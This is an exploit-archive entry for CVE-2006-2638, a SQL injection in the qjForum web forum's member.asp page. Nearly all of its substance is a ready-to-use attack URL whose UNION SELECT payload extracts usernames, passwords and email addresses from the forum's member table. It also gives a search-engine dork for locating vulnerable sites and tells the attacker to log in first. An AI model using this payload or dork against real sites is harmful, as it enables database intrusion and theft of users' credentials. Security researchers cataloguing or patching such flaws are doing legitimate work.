qjForum - 'member.asp' SQL Injection



EKU-ID: 9852 CVE: OSVDB-25786;CVE-2006-2638 OSVDB-ID:
Author: ajann Published: 2006-05-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Title  :   qjForum(member.asp) SQL Injection Vulnerability
# Author :   ajann
# greetz :   Nukedx,TheHacker
# Dork   :   "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

# milw0rm.com [2006-05-26]